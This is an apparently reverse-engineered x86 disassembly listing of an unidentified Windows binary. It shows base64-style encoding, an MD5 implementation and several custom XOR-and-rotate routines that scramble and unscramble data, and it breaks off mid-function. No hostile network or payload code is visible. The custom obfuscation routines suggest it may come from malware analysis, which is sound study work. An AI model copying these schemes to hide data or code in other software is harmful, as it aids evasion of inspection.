mov cl, [esi+edi]
and cl, 0Fh
inc eax
shl cl, 2
inc esi
cmp esi, [ebp+arg_8]
jz short loc_409C3C
movzx ebx, byte ptr [esi+edi]
movzx ecx, cl
shr ebx, 6
or ebx, ecx
mov cl, byte_414030[ebx]
mov [eax+edx], cl
mov cl, [esi+edi]
and ecx, 3Fh
inc eax
mov cl, byte_414030[ecx]
mov [eax+edx], cl
inc eax
inc esi
cmp esi, [ebp+arg_8]
jz short loc_409C4C
movzx ecx, byte ptr [esi+edi]
shr ecx, 2
mov cl, byte_414030[ecx]
mov [eax+edx], cl
mov cl, [esi+edi]
and cl, 3
inc eax
shl cl, 4
inc esi
cmp esi, [ebp+arg_8]
jnz short loc_409BCB
loc_409C3C: ; CODE XREF: sub_409B9F+2A�j
; sub_409B9F+4F�j
movzx ecx, cl
or ecx, 1
mov cl, byte_414030[ecx]
mov [eax+edx], cl
inc eax
loc_409C4C: ; CODE XREF: sub_409B9F+7B�j
and byte ptr [eax+edx], 0
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409B9F endp
; =============== S U B R O U T I N E =======================================
sub_409C55 proc near ; CODE XREF: sub_40735A+218�p
; sub_4098BB+A3�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_410826 ; strlen
pop ecx
xor ecx, ecx
test eax, eax
jle short loc_409C81
loc_409C68: ; CODE XREF: sub_409C55+2A�j
mov dl, [ecx+esi]
movsx edi, dl
cmp byte_4186E0[edi], 0
jnz short loc_409C7C
cmp dl, 41h
jnz short loc_409C87
loc_409C7C: ; CODE XREF: sub_409C55+20�j
inc ecx
cmp ecx, eax
jl short loc_409C68
loc_409C81: ; CODE XREF: sub_409C55+11�j
push 1
pop eax
loc_409C84: ; CODE XREF: sub_409C55+34�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_409C87: ; CODE XREF: sub_409C55+25�j
xor eax, eax
jmp short loc_409C84
sub_409C55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C8B proc near ; CODE XREF: seg000:00410635�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
lea eax, [ebp+var_58]
push eax
call sub_409F29
push [ebp+arg_4]
lea eax, [ebp+var_58]
push [ebp+arg_0]
push eax
call sub_409F51
lea eax, [ebp+var_58]
push eax
push offset byte_4187E4
call sub_409FF0
add esp, 18h
lea eax, byte_4187E4
push 10h
pop edx
loc_409CC3: ; CODE XREF: sub_409C8B+40�j
mov cl, [eax]
rol cl, cl
mov [eax], cl
inc eax
dec edx
jnz short loc_409CC3
leave
retn
sub_409C8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409CCF proc near ; CODE XREF: sub_40735A+15�p
; sub_40CA47+F9�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
xor ecx, ecx
xor eax, eax
loc_409CDA: ; CODE XREF: sub_409CCF+2D�j
mov cl, [esi]
test ecx, ecx
jz short loc_409CFE
cmp ecx, 61h
jb short loc_409CE8
sub ecx, 20h
loc_409CE8: ; CODE XREF: sub_409CCF+14�j
and ecx, 7Fh
add eax, ecx
and ecx, 0Fh
mov cl, byte_4187E4[ecx]
add eax, ecx
rol eax, 3
inc esi
jmp short loc_409CDA
; ---------------------------------------------------------------------------
loc_409CFE: ; CODE XREF: sub_409CCF+F�j
pop esi
pop ebp
retn
sub_409CCF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409D01 proc near ; CODE XREF: seg000:0041063D�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push esi
lea eax, [ebp+var_58]
push edi
push eax
call sub_409F29
push [ebp+arg_4]
lea eax, [ebp+var_58]
push [ebp+arg_0]
push eax
call sub_409F51
lea eax, [ebp+var_58]
push eax
push offset dword_4187F8
call sub_409FF0
add esp, 18h
lea esi, dword_4187F8
mov edi, esi
push 10h
pop ecx
loc_409D3D: ; CODE XREF: sub_409D01+44�j
lodsb
xor al, 0AAh
add al, al
or al, 1
stosb
loop loc_409D3D
pop edi
pop esi
leave
retn
sub_409D01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409D4B proc near ; CODE XREF: sub_409E1D+D�p
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push esi
xor esi, esi
test eax, eax
mov [ebp+var_8], esi
jle short loc_409DAF
push ebx
push edi
push 10h
mov edi, [ebp+arg_8]
cdq
pop ecx
idiv ecx
mov [ebp+var_1], dl
shl [ebp+var_1], 2
loc_409D6F: ; CODE XREF: sub_409D4B+60�j
mov eax, [ebp+arg_0]
push 10h
lea ecx, [esi+eax]
mov eax, esi
cdq
pop esi
add byte ptr [ecx], 0CDh
idiv esi
movzx eax, byte ptr [edx+edi]
push 10h
pop ebx
lea esi, [edx+edi]
cdq
idiv ebx
mov al, [ecx]
sub al, [edx+edi]
mov [ecx], al
mov dl, [esi]
mov esi, [ebp+var_8]
not dl
xor dl, al
xor dl, [ebp+var_1]
inc dl
inc esi
cmp esi, [ebp+arg_4]
mov [ecx], dl
mov [ebp+var_8], esi
jl short loc_409D6F
pop edi
pop ebx
loc_409DAF: ; CODE XREF: sub_409D4B+10�j
pop esi
leave
retn
sub_409D4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409DB2 proc near ; CODE XREF: sub_409E33+D�p
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push edi
xor edi, edi
test eax, eax
mov [ebp+var_8], edi
jle short loc_409E1A
push ebx
push esi
push 10h
mov esi, [ebp+arg_8]
cdq
pop ecx
idiv ecx
mov [ebp+var_1], dl
shl [ebp+var_1], 2
loc_409DD6: ; CODE XREF: sub_409DB2+64�j
mov eax, [ebp+arg_0]
push 10h
lea ecx, [edi+eax]
mov eax, edi
cdq
pop edi
mov bl, [ecx]
idiv edi
dec bl
xor bl, [ebp+var_1]
mov [ecx], bl
mov al, [edx+esi]
not al
xor al, bl
mov byte ptr [ebp+arg_8+3], al
mov [ecx], al
movzx eax, byte ptr [edx+esi]
add edx, esi
cdq
idiv edi
mov edi, [ebp+var_8]
mov al, [edx+esi]
add al, byte ptr [ebp+arg_8+3]
add al, 33h
inc edi
cmp edi, [ebp+arg_4]
mov [ecx], al
mov [ebp+var_8], edi
jl short loc_409DD6
pop esi
pop ebx
loc_409E1A: ; CODE XREF: sub_409DB2+10�j
pop edi
leave
retn
sub_409DB2 endp
; =============== S U B R O U T I N E =======================================
sub_409E1D proc near ; CODE XREF: sub_40735A+1B7�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_4187F8
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_409D4B
add esp, 0Ch
retn
sub_409E1D endp
; =============== S U B R O U T I N E =======================================
sub_409E33 proc near ; CODE XREF: sub_40735A+26F�p
; sub_408F9D+5CB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_4187F8
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_409DB2
add esp, 0Ch
retn
sub_409E33 endp
; =============== S U B R O U T I N E =======================================
sub_409E49 proc near ; CODE XREF: sub_40735A+1C4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
lea esi, [eax+4]
push ebx
push eax
push esi
call sub_410838 ; memcpy
add esp, 0Ch
call sub_40AB05
xor edi, edi
test ebx, ebx
jle short loc_409E88
loc_409E6D: ; CODE XREF: sub_409E49+3D�j
mov cl, [edi+esi]
push 1
add cl, al
push eax
xor cl, al
mov [edi+esi], cl
call sub_410B06 ; _lrotl
add eax, edi
inc edi
pop ecx
cmp edi, ebx
pop ecx
jl short loc_409E6D
loc_409E88: ; CODE XREF: sub_409E49+22�j
lea edi, [ebx-1]
loc_409E8B: ; CODE XREF: sub_409E49+5E�j
cmp edi, 0FFFFFFFFh
jz short loc_409EA9
mov cl, [edi+esi]
push 1
add cl, al
push eax
xor cl, al
mov [edi+esi], cl
call sub_410B06 ; _lrotl
pop ecx
add eax, edi
pop ecx
dec edi
jmp short loc_409E8B
; ---------------------------------------------------------------------------
loc_409EA9: ; CODE XREF: sub_409E49+45�j
mov [esi-4], eax
pop edi
lea eax, [ebx+4]
pop esi
pop ebx
retn
sub_409E49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409EB3 proc near ; CODE XREF: sub_40735A+260�p
; sub_408F9D+5BE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
push esi
mov esi, [ebp+arg_0]
add eax, 0FFFFFFFCh
push edi
mov ebx, [esi]
push eax
lea eax, [esi+4]
push eax
push esi
call sub_410B12 ; memmove
sub [ebp+arg_4], 4
xor edi, edi
add esp, 0Ch
cmp [ebp+arg_4], edi
jle short loc_409EFB
loc_409EDD: ; CODE XREF: sub_409EB3+46�j
sub ebx, edi
push 1
push ebx
call sub_410B0C ; _lrotr
mov ebx, eax
mov al, [edi+esi]
xor al, bl
pop ecx
sub al, bl
pop ecx
mov [edi+esi], al
inc edi
cmp edi, [ebp+arg_4]
jl short loc_409EDD
loc_409EFB: ; CODE XREF: sub_409EB3+28�j
mov eax, [ebp+arg_4]
lea edi, [eax-1]
loc_409F01: ; CODE XREF: sub_409EB3+6C�j
cmp edi, 0FFFFFFFFh
jz short loc_409F21
sub ebx, edi
push 1
push ebx
call sub_410B0C ; _lrotr
mov ebx, eax
mov al, [edi+esi]
xor al, bl
pop ecx
sub al, bl
pop ecx
mov [edi+esi], al
dec edi
jmp short loc_409F01
; ---------------------------------------------------------------------------
loc_409F21: ; CODE XREF: sub_409EB3+51�j
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409EB3 endp
; =============== S U B R O U T I N E =======================================
sub_409F29 proc near ; CODE XREF: sub_409C8B+A�p
; sub_409D01+C�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword ptr [eax+10h], 0
and dword ptr [eax+14h], 0
mov dword ptr [eax], 67452301h
mov dword ptr [eax+4], 0EFCDAB89h
mov dword ptr [eax+8], 98BADCFEh
mov dword ptr [eax+0Ch], 10325476h
retn
sub_409F29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409F51 proc near ; CODE XREF: sub_409C8B+19�p
; sub_409D01+1B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push esi
mov esi, [ebp+arg_0]
push edi
mov eax, [esi+10h]
lea ecx, [eax+ebx*8]
cmp ecx, eax
mov [esi+10h], ecx
jnb short loc_409F6D
inc dword ptr [esi+14h]
loc_409F6D: ; CODE XREF: sub_409F51+17�j
mov ecx, ebx
shr ecx, 1Dh
add [esi+14h], ecx
shr eax, 3
and eax, 3Fh
jz short loc_409FAD
push 40h
lea ecx, [eax+esi+18h]
pop edi
sub edi, eax
cmp ebx, edi
jnb short loc_409F91
push ebx
push [ebp+arg_4]
push ecx
jmp short loc_409FE3
; ---------------------------------------------------------------------------
loc_409F91: ; CODE XREF: sub_409F51+37�j
push edi
push [ebp+arg_4]
push ecx
call sub_410838 ; memcpy
lea eax, [esi+18h]
push eax
push esi
call sub_40A0BD
add [ebp+arg_4], edi
add esp, 14h
sub ebx, edi
loc_409FAD: ; CODE XREF: sub_409F51+2A�j
cmp ebx, 40h
jb short loc_409FDB
mov edi, ebx
shr edi, 6
loc_409FB7: ; CODE XREF: sub_409F51+88�j
push 40h
lea eax, [esi+18h]
push [ebp+arg_4]
push eax
call sub_410838 ; memcpy
push [ebp+arg_4]
push esi
call sub_40A0BD
add [ebp+arg_4], 40h
add esp, 14h
sub ebx, 40h
dec edi
jnz short loc_409FB7
loc_409FDB: ; CODE XREF: sub_409F51+5F�j
push ebx
add esi, 18h
push [ebp+arg_4]
push esi
loc_409FE3: ; CODE XREF: sub_409F51+3E�j
call sub_410838 ; memcpy
add esp, 0Ch
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409F51 endp
; =============== S U B R O U T I N E =======================================
sub_409FF0 proc near ; CODE XREF: sub_409C8B+27�p
; sub_409D01+29�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
push edi
push 3Fh
mov eax, [esi+10h]
lea edi, [esi+10h]
shr eax, 3
pop ecx
and eax, ecx
sub ecx, eax
lea edx, [eax+esi+18h]
mov byte ptr [edx], 80h
inc edx
cmp ecx, 8
jnb short loc_40A037
push ebx
push ecx
push 0
push edx
call sub_410850 ; memset
lea ebx, [esi+18h]
push ebx
push esi
call sub_40A0BD
push 38h
push 0
push ebx
call sub_410850 ; memset
add esp, 20h
pop ebx
jmp short loc_40A046
; ---------------------------------------------------------------------------
loc_40A037: ; CODE XREF: sub_409FF0+21�j
add ecx, 0FFFFFFF8h
push ecx
push 0
push edx
call sub_410850 ; memset
add esp, 0Ch
loc_40A046: ; CODE XREF: sub_409FF0+45�j
push 8
lea eax, [esi+50h]
push edi
push eax
call sub_40A078
lea eax, [esi+18h]
push eax
push esi
call sub_40A0BD
push 10h
push esi
push [esp+24h+arg_0]
call sub_40A078
push 4
push 0
push esi
call sub_410850 ; memset
add esp, 2Ch
pop edi
pop esi
retn
sub_409FF0 endp
; =============== S U B R O U T I N E =======================================
sub_40A078 proc near ; CODE XREF: sub_409FF0+5D�p
; sub_409FF0+73�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp [esp+arg_8], 0
jbe short locret_40A0BC
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
push esi
or esi, 0FFFFFFFFh
lea eax, [edx+1]
sub esi, edx
loc_40A090: ; CODE XREF: sub_40A078+41�j
mov dl, [ecx]
mov [eax-1], dl
mov edx, [ecx]
shr edx, 8
mov [eax], dl
mov edx, [ecx]
shr edx, 10h
mov [eax+1], dl
mov edx, [ecx]
shr edx, 18h
mov [eax+2], dl
add eax, 4
add ecx, 4
lea edx, [esi+eax]
cmp edx, [esp+4+arg_8]
jb short loc_40A090
pop esi
locret_40A0BC: ; CODE XREF: sub_40A078+5�j
retn
sub_40A078 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A0BD proc near ; CODE XREF: sub_409F51+4F�p
; sub_409F51+78�p ...
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 44h
push ebx
push esi
push edi
push 40h
push [ebp+arg_4]
lea eax, [ebp+var_44]
push eax
call sub_40A95D
mov eax, [ebp+arg_0]
add esp, 0Ch
mov edi, [eax+4]
mov edx, [eax+0Ch]
mov ebx, [eax+8]
mov esi, edi
mov ecx, [eax]
not esi
and esi, edx
mov edx, ebx
and edx, edi
or esi, edx
add esi, ecx
mov ecx, [ebp+var_44]
lea edx, [esi+ecx-28955B88h]
mov esi, edi
mov ecx, edx
shr ecx, 19h
shl edx, 7
or ecx, edx
add ecx, edi
mov edx, ecx
and esi, ecx
not edx
and edx, ebx
or edx, esi
mov esi, [eax+0Ch]
add edx, [ebp+var_40]
lea esi, [esi+edx-173848AAh]
mov edx, esi
shr edx, 14h
shl esi, 0Ch
or edx, esi
add edx, ecx
mov esi, edx
not esi
and esi, edi
mov edi, edx
and edi, ecx
or esi, edi
add esi, [ebp+var_3C]
lea esi, [ebx+esi+242070DBh]
mov ebx, edx
mov edi, esi
shr edi, 0Fh
shl esi, 11h
or edi, esi
add edi, edx
mov esi, edi
and ebx, edi
not esi
and esi, ecx
mov [ebp+var_4], edi
or esi, ebx
mov ebx, [eax+4]
add esi, [ebp+var_38]
lea ebx, [ebx+esi-3E423112h]
mov esi, ebx
shl esi, 16h
shr ebx, 0Ah
or esi, ebx
add esi, edi
mov ebx, esi
and edi, esi
not ebx
and ebx, edx
or ebx, edi
add ebx, [ebp+var_34]
lea ecx, [ecx+ebx-0A83F051h]
mov edi, ecx
shr edi, 19h
shl ecx, 7
or edi, ecx
add edi, esi
mov ecx, esi
mov [ebp+arg_4], edi
and ecx, [ebp+arg_4]
not edi
and edi, [ebp+var_4]
or edi, ecx
add edi, [ebp+var_30]
lea edx, [edx+edi+4787C62Ah]
mov ecx, edx
shr ecx, 14h
shl edx, 0Ch
or ecx, edx
add ecx, [ebp+arg_4]
mov edx, ecx
mov edi, ecx
and edi, [ebp+arg_4]
mov ebx, ecx
not edx
and edx, esi
or edx, edi
mov edi, [ebp+var_4]
add edx, [ebp+var_2C]
lea edi, [edi+edx-57CFB9EDh]
mov edx, edi
shr edx, 0Fh
shl edi, 11h
or edx, edi
add edx, ecx
mov edi, edx
and ebx, edx
not edi
and edi, [ebp+arg_4]
or edi, ebx
mov ebx, edx
add edi, [ebp+var_28]
lea esi, [esi+edi-2B96AFFh]
mov edi, esi
shl edi, 16h
shr esi, 0Ah
or edi, esi
add edi, edx
mov esi, edi
and ebx, edi
not esi
and esi, ecx
mov [ebp+arg_0], edi
or esi, ebx
mov ebx, [ebp+arg_4]
add esi, [ebp+var_24]
lea ebx, [ebx+esi+698098D8h]
mov esi, ebx
shr esi, 19h
shl ebx, 7
or esi, ebx
add esi, edi
mov ebx, esi
and edi, esi
not ebx
and ebx, edx
or ebx, edi
add ebx, [ebp+var_20]
lea ecx, [ecx+ebx-74BB0851h]
mov edi, ecx
shr edi, 14h
shl ecx, 0Ch
or edi, ecx
add edi, esi
mov ecx, edi
mov ebx, edi
not ecx
and ecx, [ebp+arg_0]
and ebx, esi
or ecx, ebx
add ecx, [ebp+var_1C]
lea edx, [edx+ecx-0A44Fh]
mov ebx, edx
shr ebx, 0Fh
shl edx, 11h
or ebx, edx
add ebx, edi
mov ecx, ebx
mov edx, edi
not ecx
and ecx, esi
and edx, ebx
or ecx, edx
mov edx, [ebp+arg_0]
add ecx, [ebp+var_18]
mov [ebp+var_4], ebx
lea edx, [edx+ecx-76A32842h]
mov ecx, edx
shl ecx, 16h
shr edx, 0Ah
or ecx, edx
add ecx, ebx
mov edx, ecx
and ebx, ecx
not edx
and edx, edi
or edx, ebx
add edx, [ebp+var_14]
lea esi, [esi+edx+6B901122h]
mov edx, esi
shr edx, 19h
shl esi, 7
or edx, esi
mov esi, ecx
add edx, ecx
mov [ebp+arg_4], edx
and esi, [ebp+arg_4]
not edx
and edx, [ebp+var_4]
or edx, esi
add edx, [ebp+var_10]
lea edi, [edi+edx-2678E6Dh]
mov edx, edi
shr edx, 14h
shl edi, 0Ch
or edx, edi
mov edi, ecx
add edx, [ebp+arg_4]
mov [ebp+arg_0], edx
mov esi, edx
not [ebp+arg_0]
and esi, [ebp+arg_4]
and edi, [ebp+arg_0]
mov ebx, edx
or esi, edi
mov edi, [ebp+var_4]
add esi, [ebp+var_C]
lea edi, [edi+esi-5986BC72h]
mov esi, edi
shr esi, 0Fh
shl edi, 11h
or esi, edi
add esi, edx
mov [ebp+var_4], esi
and ebx, esi
not [ebp+var_4]
mov edi, [ebp+var_4]
and edi, [ebp+arg_4]
or edi, ebx
mov ebx, esi
add edi, [ebp+var_8]
and ebx, [ebp+arg_0]
lea ecx, [ecx+edi+49B40821h]
mov edi, ecx
shl edi, 16h
shr ecx, 0Ah
or edi, ecx
mov ecx, edx
add edi, esi
and ecx, edi
or ecx, ebx
mov ebx, [ebp+arg_4]
add ecx, [ebp+var_40]
lea ecx, [ebx+ecx-9E1DA9Eh]
mov ebx, ecx
shr ebx, 1Bh
shl ecx, 5
or ebx, ecx
mov ecx, [ebp+var_4]
add ebx, edi
and ecx, edi
mov [ebp+arg_4], ebx
mov [ebp+arg_0], ecx
mov ecx, esi
and ecx, ebx
mov ebx, ecx
mov ecx, [ebp+arg_0]
or ecx, ebx
add ecx, [ebp+var_2C]
lea edx, [edx+ecx-3FBF4CC0h]
mov ecx, edx
shr ecx, 17h
shl edx, 9
or ecx, edx
mov edx, edi
add ecx, [ebp+arg_4]
not edx
and edx, [ebp+arg_4]
mov ebx, ecx
and ebx, edi
or edx, ebx
add edx, [ebp+var_18]
lea esi, [esi+edx+265E5A51h]
mov edx, esi
shr edx, 12h
shl esi, 0Eh
or edx, esi
mov esi, [ebp+arg_4]
add edx, ecx
mov [ebp+var_4], edx
and edx, [ebp+arg_4]
not esi
and esi, ecx
mov ebx, [ebp+var_4]
or esi, edx
add esi, [ebp+var_44]
lea edi, [edi+esi-16493856h]
mov esi, ecx
mov edx, edi
shl edx, 14h
shr edi, 0Ch
or edx, edi
mov edi, ecx
add edx, ebx
not esi
and esi, ebx
and edi, edx
or esi, edi
mov edi, [ebp+arg_4]
add esi, [ebp+var_30]
lea esi, [edi+esi-29D0EFA3h]
mov edi, esi
shr edi, 1Bh
shl esi, 5
or edi, esi
mov esi, ebx
add edi, edx
mov [ebp+arg_4], edi
mov edi, ebx
and edi, [ebp+arg_4]
not esi
and esi, edx
or esi, edi
add esi, [ebp+var_1C]
lea ecx, [ecx+esi+2441453h]
mov esi, ecx
shr esi, 17h
shl ecx, 9
or esi, ecx
mov ecx, edx
add esi, [ebp+arg_4]
not ecx
and ecx, [ebp+arg_4]
mov edi, esi
and edi, edx
or ecx, edi
add ecx, [ebp+var_8]
lea edi, [ebx+ecx-275E197Fh]
mov ecx, edi
shr ecx, 12h
shl edi, 0Eh
or ecx, edi
mov edi, [ebp+arg_4]
add ecx, esi
mov ebx, ecx
and ebx, [ebp+arg_4]
not edi
and edi, esi
or edi, ebx
mov ebx, esi
add edi, [ebp+var_34]
lea edx, [edx+edi-182C0438h]
mov edi, edx
shl edi, 14h
shr edx, 0Ch
or edi, edx
mov edx, esi
add edi, ecx
not edx
and edx, ecx
and ebx, edi
or edx, ebx
mov ebx, [ebp+arg_4]
add edx, [ebp+var_20]
mov [ebp+arg_0], edi
lea ebx, [ebx+edx+21E1CDE6h]
mov edx, ebx
shr edx, 1Bh
shl ebx, 5
or edx, ebx
mov ebx, ecx
not ebx
add edx, edi
and ebx, edi
mov edi, ecx
and edi, edx
or ebx, edi
add ebx, [ebp+var_C]
lea esi, [esi+ebx-3CC8F82Ah]
mov edi, esi
shr edi, 17h
shl esi, 9
or edi, esi
mov esi, [ebp+arg_0]
add edi, edx
mov ebx, edi
and ebx, [ebp+arg_0]
not esi
and esi, edx
or esi, ebx
add esi, [ebp+var_38]
lea ecx, [ecx+esi-0B2AF279h]
mov esi, ecx
shr esi, 12h
shl ecx, 0Eh
or esi, ecx
mov ecx, edx
add esi, edi
not ecx
mov ebx, esi
and ecx, edi
and ebx, edx
or ecx, ebx
mov ebx, [ebp+arg_0]
add ecx, [ebp+var_24]
lea ecx, [ebx+ecx+455A14EDh]
mov ebx, ecx
shl ebx, 14h
shr ecx, 0Ch
or ebx, ecx
mov ecx, edi
add ebx, esi
mov [ebp+arg_0], ebx
mov ebx, edi
and ebx, [ebp+arg_0]
not ecx
and ecx, esi
or ecx, ebx
add ecx, [ebp+var_10]
lea edx, [edx+ecx-561C16FBh]
mov ecx, edx
shr ecx, 1Bh
shl edx, 5
or ecx, edx
mov edx, esi
add ecx, [ebp+arg_0]
mov [ebp+arg_4], ecx
mov ecx, esi
and edx, [ebp+arg_4]
mov ebx, [ebp+arg_4]
not ecx
and ecx, [ebp+arg_0]
or ecx, edx
mov edx, [ebp+arg_0]
add ecx, [ebp+var_3C]
not edx
and edx, ebx
lea edi, [edi+ecx-3105C08h]
mov ecx, edi
shr ecx, 17h
shl edi, 9
or ecx, edi
add ecx, ebx
mov edi, ecx
and edi, [ebp+arg_0]
or edx, edi
add edx, [ebp+var_28]
lea esi, [esi+edx+676F02D9h]
mov edx, esi
shr edx, 12h
shl esi, 0Eh
or edx, esi
mov esi, ebx
add edx, ecx
not esi
mov edi, edx
and esi, ecx
and edi, ebx
or esi, edi
mov edi, [ebp+arg_0]
add esi, [ebp+var_14]
lea edi, [edi+esi-72D5B376h]
mov esi, edi
shl esi, 14h
shr edi, 0Ch
or esi, edi
mov edi, ecx
add esi, edx
xor edi, edx
xor edi, esi
add edi, [ebp+var_30]
lea ebx, [ebx+edi-5C6BEh]
mov edi, ebx
shr edi, 1Ch
shl ebx, 4
or edi, ebx
mov ebx, edx
add edi, esi
xor ebx, esi
xor ebx, edi
add ebx, [ebp+var_24]
lea ecx, [ecx+ebx-788E097Fh]
mov ebx, ecx
shr ebx, 15h
shl ecx, 0Bh
or ebx, ecx
add ebx, edi
mov ecx, ebx
xor ecx, esi
xor ecx, edi
add ecx, [ebp+var_18]
lea edx, [edx+ecx+6D9D6122h]
mov ecx, edx
shr ecx, 10h
shl edx, 10h
or ecx, edx
mov edx, ebx
add ecx, ebx
mov [ebp+var_4], ecx
xor edx, ecx
mov ecx, edx
xor ecx, edi
add ecx, [ebp+var_C]
lea esi, [esi+ecx-21AC7F4h]
mov ecx, esi
shl ecx, 17h
shr esi, 9
or ecx, esi
add ecx, [ebp+var_4]
xor edx, ecx
add edx, [ebp+var_40]
lea edi, [edi+edx-5B4115BCh]
mov edx, edi
shr edx, 1Ch
shl edi, 4
or edx, edi
mov edi, [ebp+var_4]
mov esi, edi
add edx, ecx
xor esi, ecx
xor esi, edx
add esi, [ebp+var_34]
lea ebx, [ebx+esi+4BDECFA9h]
mov esi, ebx
shr esi, 15h
shl ebx, 0Bh
or esi, ebx
add esi, edx
mov ebx, esi
mov [ebp+arg_4], esi
xor ebx, ecx
xor ebx, edx
add ebx, [ebp+var_28]
lea ebx, [edi+ebx-944B4B0h]
mov edi, ebx
shr edi, 10h
shl ebx, 10h
or edi, ebx
add edi, esi
xor [ebp+arg_4], edi
mov ebx, [ebp+arg_4]
xor ebx, edx
add ebx, [ebp+var_1C]
lea ebx, [ecx+ebx-41404390h]
mov ecx, ebx
shl ecx, 17h
shr ebx, 9
or ecx, ebx
mov ebx, [ebp+arg_4]
add ecx, edi
xor ebx, ecx
add ebx, [ebp+var_10]
lea ebx, [edx+ebx+289B7EC6h]
mov edx, ebx
shr edx, 1Ch
shl ebx, 4
or edx, ebx
mov ebx, edi
add edx, ecx
xor ebx, ecx
xor ebx, edx
add ebx, [ebp+var_44]
lea esi, [esi+ebx-155ED806h]
mov ebx, esi
shr ebx, 15h
shl esi, 0Bh
or ebx, esi
add ebx, edx
mov esi, ebx
mov [ebp+arg_4], ebx
xor esi, ecx
xor esi, edx
add esi, [ebp+var_38]
lea esi, [edi+esi-2B10CF7Bh]
mov edi, esi
shr edi, 10h
shl esi, 10h
or edi, esi
add edi, ebx
xor [ebp+arg_4], edi
mov esi, [ebp+arg_4]
xor esi, edx
add esi, [ebp+var_2C]
lea esi, [ecx+esi+4881D05h]
mov ecx, esi
shl ecx, 17h
shr esi, 9
or ecx, esi
mov esi, [ebp+arg_4]
add ecx, edi
xor esi, ecx
add esi, [ebp+var_20]
lea esi, [edx+esi-262B2FC7h]
mov edx, esi
shr edx, 1Ch
shl esi, 4
or edx, esi
mov esi, edi
add edx, ecx
xor esi, ecx
xor esi, edx
add esi, [ebp+var_14]
lea ebx, [ebx+esi-1924661Bh]
mov esi, ebx
shr esi, 15h
shl ebx, 0Bh
or esi, ebx
add esi, edx
mov ebx, esi
xor ebx, ecx
xor ebx, edx
add ebx, [ebp+var_8]
lea ebx, [edi+ebx+1FA27CF8h]
mov edi, ebx
shr edi, 10h
shl ebx, 10h
or edi, ebx
mov ebx, esi
add edi, esi
xor ebx, edi
xor ebx, edx
add ebx, [ebp+var_3C]
lea ecx, [ecx+ebx-3B53A99Bh]
mov ebx, ecx
shl ebx, 17h
shr ecx, 9
or ebx, ecx
mov ecx, esi
add ebx, edi
not ecx
or ecx, ebx
xor ecx, edi
add ecx, [ebp+var_44]
lea edx, [edx+ecx-0BD6DDBCh]
mov ecx, edx
shr ecx, 1Ah
shl edx, 6
or ecx, edx
mov edx, edi
add ecx, ebx
not edx
or edx, ecx
xor edx, ebx
add edx, [ebp+var_28]
lea esi, [esi+edx+432AFF97h]
mov edx, esi
shr edx, 16h
shl esi, 0Ah
or edx, esi
mov esi, ebx
add edx, ecx
not esi
or esi, edx
xor esi, ecx
add esi, [ebp+var_C]
lea edi, [edi+esi-546BDC59h]
mov esi, edi
shr esi, 11h
shl edi, 0Fh
or esi, edi
mov edi, ecx
add esi, edx
not edi
or edi, esi
xor edi, edx
add edi, [ebp+var_30]
lea ebx, [ebx+edi-36C5FC7h]
mov edi, ebx
shr ebx, 0Bh
shl edi, 15h
or edi, ebx
mov ebx, edx
not ebx
add edi, esi
or ebx, edi
xor ebx, esi
add ebx, [ebp+var_14]
lea ebx, [ecx+ebx+655B59C3h]
mov ecx, ebx
shl ebx, 6
shr ecx, 1Ah
or ecx, ebx
mov ebx, esi
not ebx
